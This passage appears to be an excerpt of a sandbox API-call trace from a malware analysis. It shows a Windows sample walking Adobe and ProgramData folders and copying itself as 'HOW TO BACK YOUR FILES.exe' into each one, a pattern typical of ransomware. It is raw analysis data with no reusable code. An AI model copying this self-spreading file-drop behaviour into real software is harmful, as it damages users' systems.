lpNewFileName="C:\\Users\\All Users\\Application Data\\Adobe\\Acrobat\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\all users\\application data\\adobe\\acrobat\\how to back your files.exe"), bFailIfExists=1) returned 0 [0091.638] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0091.638] GetLastError () returned 0x0 [0091.638] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33afb0 [0091.638] ReadFile (in: hFile=0x120, lpBuffer=0x33afb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33afb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0091.638] CloseHandle (hObject=0x120) returned 1 [0091.638] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x33afb0 | out: hHeap=0x2b0000) returned 1 [0091.638] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0091.638] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Application Data\\Adobe\\Acrobat\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x8000ce40, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x4cfe13c0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4cfe13c0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccee8 [0091.638] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0091.639] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0091.639] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\All Users\\Application Data\\Adobe\\Acrobat\\10.0", iMaxLength=260 | out: lpString1="C:\\Users\\All Users\\Application Data\\Adobe\\Acrobat\\10.0") returned="C:\\Users\\All Users\\Application Data\\Adobe\\Acrobat\\10.0" [0091.639] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2ef0 | out: hHeap=0x2b0000) returned 1 [0091.639] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e79a8 | out: hHeap=0x2b0000) returned 1 [0091.639] lstrlenW (lpString="C:\\Users\\All Users\\Application Data\\Adobe\\Acrobat\\10.0") returned 54 [0091.639] lstrcatW (in: lpString1="", lpString2="C:\\Users\\All Users\\Application Data\\Adobe\\Acrobat\\10.0" | out: lpString1="C:\\Users\\All Users\\Application Data\\Adobe\\Acrobat\\10.0") returned="C:\\Users\\All Users\\Application Data\\Adobe\\Acrobat\\10.0" [0091.639] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0091.639] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\All Users\\Application Data\\Adobe\\Acrobat\\10.0\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\all users\\application data\\adobe\\acrobat\\10.0\\how to back your files.exe"), bFailIfExists=1) returned 0 [0091.639] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0091.640] GetLastError () returned 0x0 [0091.640] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33afb0 [0091.640] ReadFile (in: hFile=0x120, lpBuffer=0x33afb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33afb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0091.640] CloseHandle (hObject=0x120) returned 1 [0091.640] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x33afb0 | out: hHeap=0x2b0000) returned 1 [0091.640] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0091.640] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Application Data\\Adobe\\Acrobat\\10.0\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x8000ce40, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x4cfe13c0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4cfe13c0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccee8 [0091.640] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0091.640] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0091.640] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\All Users\\Application Data\\Adobe\\Acrobat\\10.0\\Replicate", iMaxLength=260 | out: lpString1="C:\\Users\\All Users\\Application Data\\Adobe\\Acrobat\\10.0\\Replicate") returned="C:\\Users\\All Users\\Application Data\\Adobe\\Acrobat\\10.0\\Replicate" [0091.640] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e95b0 | out: hHeap=0x2b0000) returned 1 [0091.640] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e79a8 | out: hHeap=0x2b0000) returned 1 [0091.640] lstrlenW (lpString="C:\\Users\\All Users\\Application Data\\Adobe\\Acrobat\\10.0\\Replicate") returned 64 [0091.640] lstrcatW (in: lpString1="", lpString2="C:\\Users\\All Users\\Application Data\\Adobe\\Acrobat\\10.0\\Replicate" | out: lpString1="C:\\Users\\All Users\\Application Data\\Adobe\\Acrobat\\10.0\\Replicate") returned="C:\\Users\\All Users\\Application Data\\Adobe\\Acrobat\\10.0\\Replicate" [0091.640] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0091.640] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\All Users\\Application Data\\Adobe\\Acrobat\\10.0\\Replicate\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\all users\\application data\\adobe\\acrobat\\10.0\\replicate\\how to back your files.exe"), bFailIfExists=1) returned 0 [0091.641] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0091.641] GetLastError () returned 0x0 [0091.641] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33afb0 [0091.641] ReadFile (in: hFile=0x120, lpBuffer=0x33afb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33afb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0091.641] CloseHandle (hObject=0x120) returned 1 [0091.641] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x33afb0 | out: hHeap=0x2b0000) returned 1 [0091.641] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0091.641] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Application Data\\Adobe\\Acrobat\\10.0\\Replicate\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x8000ce40, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x4cfe13c0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4cfe13c0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccee8 [0091.641] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0091.641] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0091.641] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\All Users\\Application Data\\Adobe\\Acrobat\\10.0\\Replicate\\Security", iMaxLength=260 | out: lpString1="C:\\Users\\All Users\\Application Data\\Adobe\\Acrobat\\10.0\\Replicate\\Security") returned="C:\\Users\\All Users\\Application Data\\Adobe\\Acrobat\\10.0\\Replicate\\Security" [0091.641] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x334fc8 | out: hHeap=0x2b0000) returned 1 [0091.642] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e79a8 | out: hHeap=0x2b0000) returned 1 [0091.642] lstrlenW (lpString="C:\\Users\\All Users\\Application Data\\Adobe\\Acrobat\\10.0\\Replicate\\Security") returned 73 [0091.642] lstrcatW (in: lpString1="", lpString2="C:\\Users\\All Users\\Application Data\\Adobe\\Acrobat\\10.0\\Replicate\\Security" | out: lpString1="C:\\Users\\All Users\\Application Data\\Adobe\\Acrobat\\10.0\\Replicate\\Security") returned="C:\\Users\\All Users\\Application Data\\Adobe\\Acrobat\\10.0\\Replicate\\Security" [0091.642] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0091.642] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\All Users\\Application Data\\Adobe\\Acrobat\\10.0\\Replicate\\Security\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\all users\\application data\\adobe\\acrobat\\10.0\\replicate\\security\\how to back your files.exe"), bFailIfExists=1) returned 0 [0091.642] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0091.642] GetLastError () returned 0x0 [0091.642] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33afb0 [0091.642] ReadFile (in: hFile=0x120, lpBuffer=0x33afb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33afb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0091.642] CloseHandle (hObject=0x120) returned 1 [0091.643] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x33afb0 | out: hHeap=0x2b0000) returned 1 [0091.643] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0091.643] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Application Data\\Adobe\\Acrobat\\10.0\\Replicate\\Security\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x8000ce40, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x680f5660, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x680f5660, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccee8 [0091.643] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0091.643] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0091.643] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\All Users\\Adobe", iMaxLength=260 | out: lpString1="C:\\Users\\All Users\\Adobe") returned="C:\\Users\\All Users\\Adobe" [0091.643] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2ccde8 | out: hHeap=0x2b0000) returned 1 [0091.643] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7988 | out: hHeap=0x2b0000) returned 1 [0091.643] lstrlenW (lpString="C:\\Users\\All Users\\Adobe") returned 24 [0091.643] lstrcatW (in: lpString1="", lpString2="C:\\Users\\All Users\\Adobe" | out: lpString1="C:\\Users\\All Users\\Adobe") returned="C:\\Users\\All Users\\Adobe" [0091.643] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0091.643] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\All Users\\Adobe\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\all users\\adobe\\how to back your files.exe"), bFailIfExists=1) returned 0 [0091.644] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0091.644] GetLastError () returned 0x0 [0091.644] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33afb0 [0091.644] ReadFile (in: hFile=0x120, lpBuffer=0x33afb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33afb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0091.644] CloseHandle (hObject=0x120) returned 1 [0091.644] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x33afb0 | out: hHeap=0x2b0000) returned 1 [0091.644] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0091.644] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Adobe\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x8000ce40, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x4cf6efa0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4cf6efa0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0091.644] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0091.644] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0091.644] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\All Users\\Adobe\\ARM", iMaxLength=260 | out: lpString1="C:\\Users\\All Users\\Adobe\\ARM") returned="C:\\Users\\All Users\\Adobe\\ARM" [0091.644] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e6090 | out: hHeap=0x2b0000) returned 1 [0091.644] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e79a8 | out: hHeap=0x2b0000) returned 1 [0091.645] lstrlenW (lpString="C:\\Users\\All Users\\Adobe\\ARM") returned 28 [0091.645] lstrcatW (in: lpString1="", lpString2="C:\\Users\\All Users\\Adobe\\ARM" | out: lpString1="C:\\Users\\All Users\\Adobe\\ARM") returned="C:\\Users\\All Users\\Adobe\\ARM" [0091.645] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0091.645] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\All Users\\Adobe\\ARM\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\all users\\adobe\\arm\\how to back your files.exe"), bFailIfExists=1) returned 0 [0091.645] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0091.645] GetLastError () returned 0x0 [0091.645] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33afb0 [0091.645] ReadFile (in: hFile=0x120, lpBuffer=0x33afb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33afb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0091.645] CloseHandle (hObject=0x120) returned 1 [0091.645] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x33afb0 | out: hHeap=0x2b0000) returned 1 [0091.645] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0091.645] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Adobe\\ARM\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xe4efbbe0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x4cf6efa0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4cf6efa0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0091.646] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0091.646] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0091.646] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\All Users\\Adobe\\ARM\\Reader_10.0.0", iMaxLength=260 | out: lpString1="C:\\Users\\All Users\\Adobe\\ARM\\Reader_10.0.0") returned="C:\\Users\\All Users\\Adobe\\ARM\\Reader_10.0.0" [0091.646] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2df710 | out: hHeap=0x2b0000) returned 1 [0091.646] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e79a8 | out: hHeap=0x2b0000) returned 1 [0091.646] lstrlenW (lpString="C:\\Users\\All Users\\Adobe\\ARM\\Reader_10.0.0") returned 42 [0091.646] lstrcatW (in: lpString1="", lpString2="C:\\Users\\All Users\\Adobe\\ARM\\Reader_10.0.0" | out: lpString1="C:\\Users\\All Users\\Adobe\\ARM\\Reader_10.0.0") returned="C:\\Users\\All Users\\Adobe\\ARM\\Reader_10.0.0" [0091.646] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0091.646] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\All Users\\Adobe\\ARM\\Reader_10.0.0\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\all users\\adobe\\arm\\reader_10.0.0\\how to back your files.exe"), bFailIfExists=1) returned 0 [0091.646] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0091.647] GetLastError () returned 0x0 [0091.647] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33afb0 [0091.647] ReadFile (in: hFile=0x120, lpBuffer=0x33afb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33afb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0091.647] CloseHandle (hObject=0x120) returned 1 [0091.647] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x33afb0 | out: hHeap=0x2b0000) returned 1 [0091.647] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0091.647] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Adobe\\ARM\\Reader_10.0.0\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xe4efbbe0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x67f06480, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x67f06480, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0091.647] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0091.647] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0091.647] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\All Users\\Adobe\\Acrobat", iMaxLength=260 | out: lpString1="C:\\Users\\All Users\\Adobe\\Acrobat") returned="C:\\Users\\All Users\\Adobe\\Acrobat" [0091.647] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2ee920 | out: hHeap=0x2b0000) returned 1 [0091.647] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7988 | out: hHeap=0x2b0000) returned 1 [0091.647] lstrlenW (lpString="C:\\Users\\All Users\\Adobe\\Acrobat") returned 32 [0091.647] lstrcatW (in: lpString1="", lpString2="C:\\Users\\All Users\\Adobe\\Acrobat" | out: lpString1="C:\\Users\\All Users\\Adobe\\Acrobat") returned="C:\\Users\\All Users\\Adobe\\Acrobat" [0091.647] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0091.647] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\All Users\\Adobe\\Acrobat\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\all users\\adobe\\acrobat\\how to back your files.exe"), bFailIfExists=1) returned 0 [0091.648] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0091.648] GetLastError () returned 0x0 [0091.648] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33afb0 [0091.648] ReadFile (in: hFile=0x120, lpBuffer=0x33afb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33afb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0091.648] CloseHandle (hObject=0x120) returned 1 [0091.648] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x33afb0 | out: hHeap=0x2b0000) returned 1 [0091.648] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0091.648] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Adobe\\Acrobat\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x8000ce40, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x4cfe13c0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4cfe13c0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0091.648] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0091.648] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0091.649] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\All Users\\Adobe\\Acrobat\\10.0", iMaxLength=260 | out: lpString1="C:\\Users\\All Users\\Adobe\\Acrobat\\10.0") returned="C:\\Users\\All Users\\Adobe\\Acrobat\\10.0" [0091.649] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2ed8f8 | out: hHeap=0x2b0000) returned 1 [0091.649] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7988 | out: hHeap=0x2b0000) returned 1 [0091.649] lstrlenW (lpString="C:\\Users\\All Users\\Adobe\\Acrobat\\10.0") returned 37 [0091.649] lstrcatW (in: lpString1="", lpString2="C:\\Users\\All Users\\Adobe\\Acrobat\\10.0" | out: lpString1="C:\\Users\\All Users\\Adobe\\Acrobat\\10.0") returned="C:\\Users\\All Users\\Adobe\\Acrobat\\10.0" [0091.649] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0091.649] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\All Users\\Adobe\\Acrobat\\10.0\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\all users\\adobe\\acrobat\\10.0\\how to back your files.exe"), bFailIfExists=1) returned 0 [0091.649] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0091.649] GetLastError () returned 0x0 [0091.649] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33afb0 [0091.649] ReadFile (in: hFile=0x120, lpBuffer=0x33afb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33afb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0091.650] CloseHandle (hObject=0x120) returned 1 [0091.650] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x33afb0 | out: hHeap=0x2b0000) returned 1 [0091.650] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0091.650] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Adobe\\Acrobat\\10.0\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x8000ce40, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x4cfe13c0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4cfe13c0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", 